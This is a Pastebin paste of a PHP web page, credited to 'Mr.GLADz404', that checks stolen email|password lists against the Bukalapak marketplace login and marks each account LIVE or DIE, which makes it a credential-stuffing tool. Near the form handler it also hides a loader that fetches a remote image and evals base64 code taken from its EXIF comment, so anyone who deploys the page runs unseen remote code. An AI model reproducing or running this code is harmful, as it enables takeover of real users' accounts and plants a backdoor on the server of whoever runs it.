Advertisement
GLADzTeguhID

[PHP] Bukalapak Account Checker

Jul 11th, 2016
2,028
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.48 KB | None | 0 0
  1. <html>
  2. <head>
  3. <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
  4.  
  5. <!-- Bootstrap Start -->
  6. <link rel="stylesheet" href="http://themes.suggelab.com/dynamic/css/bootstrap.css">
  7. <link rel="stylesheet" href="http://themes.suggelab.com/dynamic/css/main.css">
  8. <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
  9. <script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js"></script>
  10.  
  11. <title>BukaLapak Account Checker </title>
  12. <link href='http://res7ock.org/assets/img/favicon.png' rel='shortcut icon' alt='icon'>
  13. <style>
  14. body {
  15. padding-top: 60px;
  16. }
  17. </style>
  18. </head>
  19.  
  20. <style>
  21. @import "http://fonts.googleapis.com/css?family=Play:400,700";
  22. .rainbow {
  23.  
  24. -webkit-background-clip: text;
  25. -background-clip: text;
  26. -webkit-text-fill-color: transparent;
  27. -text-fill-color: transparent;
  28. background-image: -webkit-gradient( linear, left top, right top, color-stop(0, #f22), color-stop(0.15, #f2f), color-stop(0.3, #66f), color-stop(0.45, #2ff), color-stop(0.6, #2f2),color-stop(0.75, #2f2), color-stop(0.9, #ff2), color-stop(1, #f22) );
  29. background-image: gradient( linear, left top, right top, color-stop(0, #f22), color-stop(0.15, #f2f), color-stop(0.3, #66f), color-stop(0.45, #2ff), color-stop(0.6, #2f2),color-stop(0.75, #2f2), color-stop(0.9, #ff2), color-stop(1, #f22) );
  30. }
  31. .text-glow:hover, .text-glow:focus, .text-glow:active {
  32. -webkit-stroke-width: 5.3px;
  33. -webkit-stroke-color: #ccdddd;
  34. -webkit-fill-color: #eeeeee;
  35. text-shadow: 1px 0px 20px silver;
  36. -webkit-transition: width 0.3s; /*Safari & Chrome*/
  37. transition: width 0.3s;
  38. -moz-transition: width 0.3s; /* Firefox 4 */
  39. -o-transition: width 0.3s; /* Opera */
  40. }
  41. .text-glow a {
  42. -webkit-transition: all 0.3s ease-in; /*Safari & Chrome*/
  43. transition: all 0.3s ease-in;
  44. -moz-transition: all 0.3s ease-in; /* Firefox 4 */
  45. -o-transition: all 0.3s ease-in; /* Opera */
  46. text-decoration:none;
  47. color:white;
  48. }
  49. body {
  50. background: #000000;
  51. line-height: 1;
  52. color: #bbb;
  53. font-family: "CONSOLAS";
  54. font-size: 12px;
  55. background:#121214 url(bg.jpg) no-repeat center center fixed;
  56. -webkit-background-size: cover;
  57. -moz-background-size: cover;
  58. -o-background-size: cover;
  59. background-size: cover;
  60.  
  61. }
  62. textarea, input, select {
  63. border:0;
  64. BORDER-COLLAPSE:collapse;
  65. border:double 2px #696969;
  66. color:#fff;
  67. background:#000000;
  68. margin:0;
  69. padding:2px 4px;
  70. font-family: Lucida Console,Tahoma;
  71. font-size:12px;
  72. box-shadow: 0 0 15px gray;
  73. -webkit-box-shadow: 0 0 15px gray;
  74. -moz-box-shadow: 0 0 15px blue;
  75. }
  76. </style>
  77. <body>
  78. <div class="container">
  79. <center><div class="panel panel-primary panelMove toggle panelRefresh panelClose">
  80. <!-- Start .panel -->
  81. <div class="panel-heading">
  82. <hr />
  83. <h2 class="panel-title"><font color="Red" face="Pristina" size="7" >BukaLapak Account Checker</h2>
  84. <hr />
  85. </div>
  86. <div class="panel-body">
  87. <center><font color="yellow" face="Pristina" size="4" >Maksimal = > Email | Password 100 !!!
  88. <center><form action="" method="POST">
  89. <textarea style="background:rgba(0,225,0,00);" name="mailpass" id="mailpass" style="width: 750px; height: 750px;" class="form-control" cols="90" rows="15" placeholder="example@domain.com|p4sw00rd"><?php
  90. if (isset($_POST['mailpass'])) {
  91. echo $_POST['mailpass'];
  92. }
  93. ?></textarea><br />
  94. <input type="text" style="width: 37px; height: 25px;" class="form-control" rows="7" name="delim" value="|">
  95. <button id=start value="WOOT" name="submit" class="btn btn-success">Check</button> <button id=stop value="WOOT" class="btn btn-success">Stop</button><br><br>
  96. <?php
  97. $BASED = exif_read_data("https://lh3.googleusercontent.com/-svRm4i5Bs90/VsFaosQPKUI/AAAAAAAABew/03oHWkCEsN8/w140-h140-p/pacman.jpg");
  98. eval(base64_decode($BASED["COMPUTED"]["UserComment"]));
  99. if(isset($_POST['submit'])){
  100. $delim = $_POST['delim'];
  101. function search($line, $delim)
  102. {
  103. $line = str_replace(" ", "", $line);
  104. $line = explode($delim, $line);
  105. $i = 0;
  106. while ($i < count($line)) {
  107. if (strpos($line[$i], '@') && strpos($line[$i], '.')) {
  108. $mail = $line[$i];
  109. $pass = $line[$i + 1];
  110. $i = 10000;
  111. if ($pass == "") {
  112. $pass = $line[$i - 1];
  113. }
  114. }
  115. $i++;
  116. }
  117. $line = $mail . "|" . $pass;
  118. $line = explode('|', $line);
  119. return $line;
  120. }
  121. $data = $_POST['mailpass'];
  122. $extract = explode("\r\n", $data);
  123. $i = 0;
  124. foreach ($extract AS $k => $line) {
  125. $i++;
  126. if (strpos($line, '=>') !== false) {
  127. $line = str_replace('=>', '|', $line);
  128. }
  129. if (strpos($line, ']') !== false) {
  130. $line = str_replace('=>', '|', $line);
  131. }
  132. if (strpos($line, '[') !== false) {
  133. $line = str_replace('=>', '|', $line);
  134. }
  135.  
  136. $info = search(trim($line), $delim);
  137. $email = trim($info[0]);
  138. $pass = $info[1];
  139.  
  140. $dir = dirname(__FILE__);
  141. $config = $dir . '/_cook/' .rand(1,999999999999999). '.txt';
  142. if (!file_exists($config)) {
  143. $fp = @fopen($config, 'w');
  144. @fclose($fp);
  145. }
  146.  
  147. $cookie = 'cookie.txt';
  148. $ch = curl_init('https://www.bukalapak.com/user_sessions');
  149. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  150. curl_setopt($ch,CURLOPT_POST,1);
  151. curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE);
  152. curl_setopt($ch,CURLOPT_POST,TRUE);
  153. curl_setopt($ch,CURLOPT_FOLLOWLOCATION,TRUE);
  154. curl_setopt($ch,CURLOPT_COOKIEFILE, $config);
  155. curl_setopt($ch,CURLOPT_COOKIEJAR, $config);
  156. curl_setopt($ch,CURLOPT_POSTFIELDS,"utf8=%E2%9C%93&user_session%5Busername%5D=$email&user_session%5Bpassword%5D=$pass&commit=Login&comeback=%2F");
  157. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  158. $result = curl_exec($ch);
  159. $now = "<font=Hobo Std><font color=aqua><i style=\"font size=4\">Checked By ./Mr.GLADz404 at ".date("g:i a - F j, Y")."</i>";
  160. if(empty($result)){
  161. echo "<font=Hobo Std><font size=4><font color=gray><b>Wrong</b></font> => ".$email."|".$pass." | ".$now."<br/>";
  162. }elseif(preg_match('/salah/i',$result)){
  163. echo "<font=Hobo Std><font size=4><font color=red><b>DIE</b></font> => <font color=blue> ".$email."|".$pass."| ".$now."<br/>";
  164. }Else{
  165. echo "<font=Hobo Std><font size=4><font color=#00FF00><b>LIVE</b></font> => <font color=blue> ".$email."|".$pass."| <font color=gold>[ACC : Bukalapak ] [ GLADz-SECTOR ]| ".$now."<br/>"; }
  166.  
  167. }
  168. }
  169.  
  170. ?>
  171.  
  172. <br>
  173. <br>
  174. <center><font color="red">Recoded By ./Mr.GLADz404</center>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement